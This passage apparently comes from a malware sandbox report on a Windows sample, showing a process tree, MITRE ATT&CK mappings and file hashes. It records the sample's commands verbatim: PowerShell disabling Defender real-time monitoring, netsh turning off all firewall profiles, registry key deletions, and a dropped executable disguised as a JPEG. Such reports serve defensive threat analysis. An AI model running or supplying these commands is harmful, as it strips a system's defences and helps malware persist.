C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
-
C:\Windows\system32\cmd.exe/c netsh advfirewall set privateprofile state off >nul 2>&18⤵PID:3576
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5076
-
-
-
C:\Windows\system32\cmd.exe/c netsh advfirewall set domainprofile state off >nul 2>&18⤵PID:4432
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1016
-
-
-
C:\Windows\system32\cmd.exe/c netsh advfirewall set publicprofile state off >nul 2>&18⤵PID:3256
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4720
-
-
-
C:\Windows\system32\cmd.exe/c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul8⤵PID:4996
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f9⤵PID:4616
-
-
-
C:\ProgramData\NakedElephants.jpegC:\ProgramData\NakedElephants.jpeg FuckHerFace8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2004
-
-
C:\ProgramData\NakedElephants.jpegC:\ProgramData\NakedElephants.jpeg FuckHerFace8⤵
- Executes dropped EXE
PID:1328
-
-
C:\ProgramData\NakedElephants.jpegC:\ProgramData\NakedElephants.jpeg FuckHerFace8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4100
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\993027.vbs3⤵PID:4596
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
PID:3924
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2712
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5064
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
1File Deletion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38.3MB
MD540532ea36c2d4de56522ecf707bf289e
SHA186520c67e37b43366f965b63ba78070688bff83e
SHA25608e994aa4659a0fd4674d93ed9e683dff7c020013629e39d6ea73091f2bcd33b
SHA51241df9cc910afe6ffe7f92e1e26b607cf7fea18f52a746ca97d532406401035b5bb3ac5ebcb9bc659d4125cbf7262383aefc1f03a01886dc71e268b52ac2b43ce
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD56f9f0907d5726cd3872dda395848d100
SHA15832d2f1ad8caf5a8d532be7bae21fc1fadbd583
SHA2563a17f5275d455c560b0ae68665355262e2c100762b52e19328507d4ed8e44aff
SHA512b56cf8a7f295d69b567d53b6d0530f435ec7c5ad384be67471c5c7407a1db415e13edb50080cffe8db8ab78267a37a84bfe5b698c493dfdf5f5747764ecb0263
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5d6a0be01101794f0ce610ffb02825391
SHA13cf7accacb755e93e2755d32a98ae6a13bb83522
SHA2564540f1fd59d77cc8b1638adbe60e927dce7ae088626be11ed0b2f23f3e0635e6
SHA512e89df18eb8181b71659ad992025233186b9b99bc41048ad90d300eb77f91304f4f9cbe23f8824756073782420e927ae3fcf77b2385623c1e5536e24568af5ceb
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
2.8MB
MD5958ad5bc744e1f8a1b09e246b5f6a182
SHA163d7709c189f60d8e94b4e8a0559347b8c48350b
SHA25694e1f52951c77d6314cb353a6f6bbb085395551f37882483ceaf72a09ff145cc
SHA51269719818d54fe31758e7bb0a736411cdf18275becb6e5b4c64b8b667f75bc08e3f8556959560d77ea651fe696bed6c0a0c0131a7ee4b77de6785f6c0fc073a6a
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
241B
MD5382e1bc1c9c5a5c923e52180214218b5
SHA1ccc2e84c8520f755a5f05cf23acf74409ebd8ffb
SHA2568a550aa1569d9047511f8641fec570f4a3de8449738b18deb22a07bfdb496e82
SHA5124acd3582daa524b30d862cf166f4a3e44e0f52b442598b65082aec10468ade1643e646277fc9fe4bb9b333ad43275553217f031a08afe296f1fa76f4bb6917af
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
162KB
MD52b49be49c486e465f9f9d80f5c3f7460
SHA14d007b11d467bdabd2dcf063fd8572f81c046e5f
SHA256113b0ab445c515fe24c0cced2651d59835279410a58ab33c5fb3d3c3507bf9b8
SHA512ab2f6620ee02248613948b301fe5aa129f57603247a050b09c5b33c75e5ef05a89bd54a6a440155e1578da0ce8f1f79ba9e5f3e245d37cbcede17f1a334d6696